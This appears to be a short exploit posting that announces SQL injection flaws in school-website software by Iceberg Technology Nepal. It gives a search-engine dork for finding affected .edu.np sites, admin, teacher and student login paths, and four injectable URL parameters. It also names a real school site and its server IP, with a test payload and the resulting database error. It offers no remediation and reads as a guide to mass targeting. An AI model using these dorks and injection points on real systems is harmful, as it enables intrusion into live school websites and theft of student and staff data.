#########################################################
# Exploit Title : Iceberg Technology Software Nepal SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : icebergtechnepal.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''Developed by:Iceberg Technology'' site:edu.np
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
#########################################################
# Admin/Teacher/Student Panel Login Path :
**************************************
/teacher/index.php
/student/index.php
# SQL Injection Exploit :
*********************
/news.php?id=[SQL Injection]
/photo.php?edit=[SQL Injection]
/about.php?Title=[SQL Injection]
/admission.php?Title=[SQL Injection]
#########################################################
# Example Vulnerable Site =>
**************************
Note => (192.185.142.207) => There are 57 domains hosted on this server.
[+] basiclearning.edu.np/news.php?id=42%27 =>
[ Proof of Concept ] => archive.fo/5ILQG
#########################################################
# SQL Database Error :
********************
Warning: mysql_fetch_array() expects parameter 1 to be
resource, boolean given in /home/basiclea/public_html/news.php on line 24
#########################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#########################################################